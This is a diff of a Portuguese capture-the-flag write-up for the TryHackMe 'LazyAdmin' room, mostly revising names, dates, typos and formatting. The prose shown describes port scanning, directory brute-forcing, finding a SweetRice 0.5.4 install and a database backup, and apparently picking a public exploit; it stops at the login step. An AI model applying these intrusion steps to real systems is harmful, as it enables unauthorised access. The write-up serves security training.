--- a/TryHackMe/lazyadmin/Eikebarbosa/writeup.docx
+++ b/TryHackMe/lazyadmin/Eikebarbosa/writeup.docx
@@ -358,7 +358,7 @@
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
-              <w:t>30/10/2024</w:t>
+              <w:t>13/11/2024</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -572,7 +572,7 @@
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
-              <w:t>Nome do revisor</w:t>
+              <w:t>Sérgio Guidi Trovo</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -595,7 +595,7 @@
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
-              <w:t>Orientador</w:t>
+              <w:t>Coordenador</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -648,7 +648,7 @@
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
-              <w:t>Nome do aprovador</w:t>
+              <w:t>Sérgio Guidi Trovo</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -671,7 +671,7 @@
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
-              <w:t>Diretor</w:t>
+              <w:t>Coordenador</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -868,7 +868,7 @@
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
-              <w:t>DD/MM/AAAA</w:t>
+              <w:t>30/10/2024</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -944,7 +944,7 @@
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
-              <w:t>DD/MM/AAAA</w:t>
+              <w:t>13/11/2024</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1020,7 +1020,7 @@
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
-              <w:t>DD/MM/AAAA</w:t>
+              <w:t>13/11/2024</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1580,17 +1580,6 @@
           <w:szCs w:val="32"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:smallCaps/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>Contextualização</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1604,127 +1593,13 @@
         <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>O CTF "</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>LazyAdmin</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">" da </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>TryHackMe</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> desafia os participantes a explorar vulnerabilidades comuns em sistemas web, começando com </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>reconhecimento</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> e varredura de portas para identificar pontos de entrada. O foco inicial é acessar uma interface administrativa web, muitas vezes configurada com </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>credenciais fracas</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. A exploração envolve </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>enumeração</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> para encontrar diretórios ou arquivos ocultos e analisar configurações inadequadas. Após obter acesso, os jogadores podem realizar </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>escalada de privilégios</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> aproveitando permissões ou scripts mal configurados. O objetivo é coletar "flags" ao longo do desafio, reforçando habilidades em exploração e defesa de sistemas web.</w:t>
-      </w:r>
+          <w:smallCaps/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1738,10 +1613,25 @@
         <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
+          <w:b/>
+          <w:smallCaps/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:smallCaps/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Contextualização</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1755,13 +1645,181 @@
         <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>O CTF "</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>LazyAdmin</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">" da </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>TryHackMe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> desafia os participantes a explorar vulnerabilidades comuns em sistemas web, começando com </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>reconhecimento</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> e varredura de portas para identificar pontos de entrada. O foco inicial é acessar uma interface administrativa web, muitas vezes configurada com </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>credenciais fracas</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. A exploração envolve </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>enumeração</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> para encontrar diretórios ou arquivos ocultos e analisar configurações inadequadas. Após obter acesso, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>é possível</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> realizar </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>escalada de privilégios</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> aproveitando permissões ou scripts mal configurados. O objetivo é coletar "flags" ao longo do desafio, reforçando habilidades em exploração e defesa de sistemas web.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:b/>
           <w:smallCaps/>
           <w:color w:val="000000"/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -1770,9 +1828,11 @@
           <w:color w:val="000000"/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>Desenvolvimento</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1783,11 +1843,11 @@
           <w:color w:val="000000"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="1" w:name="_heading=h.3znysh7" w:colFirst="0" w:colLast="0"/>
       <w:bookmarkEnd w:id="1"/>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -1796,123 +1856,40 @@
           <w:color w:val="000000"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>What</w:t>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>What is the user flag?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Começando com um simples </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>scan</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:smallCaps/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:smallCaps/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>is</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:smallCaps/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:smallCaps/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>the</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:smallCaps/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:smallCaps/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>user</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:smallCaps/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> flag?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Começando com um simples </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>scan</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -1933,6 +1910,14 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve"> podemos observar que há 2 portas abertas, uma com serviço HTTP (80) e a outra com o serviço SSH (22)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2111,25 +2096,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Analisando primeira a porta HTTP, </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>aonde</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> está rodando um servidor Apache, não achamos nada de importante, apenas a página padrão do Apache.</w:t>
+        <w:t>Analisando primeira a porta HTTP, onde está rodando um servidor Apache, não achamos nada de importante, apenas a página padrão do Apache.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2214,6 +2181,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -2226,7 +2195,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">, podemos encontrar um diretório interessante, o “/contente”. </w:t>
+        <w:t>, podemos encontrar um diretório interessante, o “/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>content</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">”. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2365,16 +2352,14 @@
         </w:rPr>
         <w:t>/common.txt -</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>u  http</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>u http</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -2473,6 +2458,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -2561,6 +2548,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -2574,6 +2563,14 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>, sendo ele 0.5.4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2648,6 +2645,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -2877,6 +2876,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -3067,7 +3068,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Achamos um arquivo em SQL. Precisamos baixá-lo e analisá-lo, para ver se conseguimos achar algum usuário no banco de dados</w:t>
+        <w:t>Achamos um arquivo SQL. Precisamos baixá-lo e analisá-lo, para ver se conseguimos achar algum usuário no banco de dados</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3151,6 +3160,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -3185,6 +3196,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -3282,6 +3295,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -3294,7 +3309,31 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>, pegamos a 7° opção, baixamos, e mudamos novamente a URL, para poder acessar a página de login</w:t>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>utilizamos</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a 7° opção, baixamos, e mudamos novamente a URL, para poder acessar a página de login</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3424,7 +3463,39 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Somos redirecionados para a tela de login, e então só acessar. (</w:t>
+        <w:t>Somos redirecionados para a tela de login, e então</w:t>
